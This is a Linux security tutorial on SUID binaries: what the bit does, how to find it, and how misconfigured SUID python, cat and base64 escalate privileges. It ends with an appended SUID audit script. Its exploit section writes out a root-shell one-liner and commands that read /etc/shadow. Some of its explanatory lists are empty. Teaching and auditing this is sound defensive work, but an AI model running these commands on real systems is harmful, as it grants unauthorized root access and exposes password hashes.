SUID Binary Exploits

What is SUID?

SUID (Set User ID) is a special permission bit in Linux that can be set on an executable file. When a file has the SUID bit set, anyone who runs it does so with the permissions of the file's owner rather than their own.

The owner is often root (the system administrator), so if a file is owned by root and has the SUID bit set, any user who runs it gets a process whose effective user ID is root for the duration of that execution.

This means that even if a user is a regular user with no special privileges, by running a SUID file, they get access to root (administrator) privileges for that specific file execution.

How to Check and Set SUID Permissions

To check if a file has the SUID bit set, you can use the following command:

$ ls -l 

This will list the file's details, and if the file has the SUID bit set, you will see an "s" in the owner's execute position of the file's permissions (like: -rwsr-xr-x).

How to Set and Remove the SUID Bit

If you want to set or remove the SUID permission for a file, you can use the chmod command:

To set the SUID bit:

$ sudo chmod u+s 

In this command:

For example, to set the SUID bit for a file called example.sh, you would use:

$ sudo chmod u+s example.sh

To remove the SUID bit:

$ sudo chmod u-s 

In this command:

For example, to remove the SUID bit from example.sh, you would use:

$ sudo chmod u-s example.sh

How to Identify SUID Binaries

$ find / -type f -perm -4000 2>/dev/null

This command will list all files with the SUID bit set on your system.

Breaking Down the Find Command

The following command is used to find files with the SUID bit set:

$ find / -type f -perm -4000 2>/dev/null

Explanation of the Command:

So, the entire command will search for files with the SUID bit set in the whole system and ignore any errors that occur due to restricted access.

Why Are They Dangerous?

If a SUID binary has a security vulnerability or flaw, an attacker could exploit it to gain root access. This is why SUID binaries need to be carefully managed and secured to prevent malicious use.

Practical Example: Exploiting SUID Binaries

Let's go through a real example to understand how SUID binaries can be dangerous if misconfigured.

Finding SUID Binaries

To find all files with the SUID bit set, run the following command:

$ find / -type f -perm -4000 2>/dev/null

[Screenshot: List of SUID Binaries]

In this example, the output includes SUID files such as /usr/bin/python3.4, /bin/cat, and /usr/bin/base64.

Exploiting /usr/bin/python3.4

If python3.4 is a SUID binary and owned by root, we can use it to spawn a root shell:

$ /usr/bin/python3.4 -c 'import os; os.execl("/bin/sh", "sh")'

Once executed, you can confirm you have root access by running:

# whoami
root

Exploiting /bin/cat

The cat command can't spawn a shell, but since it's SUID, it can read protected files. For example:

$ cat /etc/shadow

Exploiting /usr/bin/base64

As shown above, /usr/bin/base64 is a SUID binary. According to GTFOBins, it can be used to read files like this:

$ /usr/bin/base64 /etc/shadow

This will output the contents in base64. You can decode it using:

$ /usr/bin/base64 /etc/shadow | base64 -d

[Screenshot: GTFOBins base64 example]

As shown in the GTFOBins screenshot above, you can use base64 to read any file if it runs with elevated privileges.

What is GTFOBins?

GTFOBins is a curated list of Unix binaries that can be exploited when misconfigured (e.g., with SUID or sudo). These can allow:

Visit https://gtfobins.github.io/ to explore more.

Conclusion

This example demonstrates how misconfigured SUID binaries like python3.4 can give attackers root access, while others like cat may still leak sensitive data. Always audit and secure SUID binaries to protect your system.
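As an added defensive example (not part of the original article), the following POSIX shell script wraps the find command broken down earlier and turns the conclusion's "audit your SUID binaries" advice into a repeatable check: every SUID file is compared against an allowlist, and names the article calls out (python, cat, base64) are flagged. The allowlist contents and the set of flagged names are assumptions to adapt per host.

```bash
#!/bin/sh
# suid_audit.sh: find SUID files under a given root (same predicate as the
# article's find command) and classify each one against an allowlist.
# Run as: sh suid_audit.sh /

# ASSUMPTION: placeholder allowlist of SUID binaries expected on this host;
# replace it with the baseline taken from a known-good build of your image.
SUID_ALLOWLIST="/usr/bin/passwd
/usr/bin/sudo
/bin/su"

classify_suid() {
  # Print ALLOWED if $1 is in the allowlist, DANGEROUS if its name is an
  # interpreter or file reader of the kind the article shows (python3.4,
  # cat, base64), REVIEW otherwise. Always exits 0 so callers can use set -e.
  path="$1"
  for allowed in $SUID_ALLOWLIST; do
    [ "$allowed" = "$path" ] && { echo "ALLOWED"; return 0; }
  done
  case "$(basename "$path")" in
    python*|perl*|ruby*|base64|cat) echo "DANGEROUS" ;;
    *) echo "REVIEW" ;;
  esac
}

audit_suid() {
  # Print "<verdict> <path>" for every SUID regular file under $1.
  # Returns 2 if anything is DANGEROUS, 1 if anything needs REVIEW, else 0.
  # Paths containing whitespace are not handled (word splitting on $()).
  worst=0
  for f in $(find "$1" -type f -perm -4000 2>/dev/null | sort); do
    verdict=$(classify_suid "$f")
    echo "$verdict $f"
    [ "$verdict" = "DANGEROUS" ] && worst=2
    [ "$verdict" = "REVIEW" ] && [ "$worst" -lt 2 ] && worst=1
  done
  return "$worst"
}

if [ "$#" -gt 0 ]; then
  audit_suid "$1"
fi
```

A non-zero exit status makes the script usable as a CI or configuration-management gate, so an unexpected SUID interpreter fails the build instead of waiting to be found by an attacker.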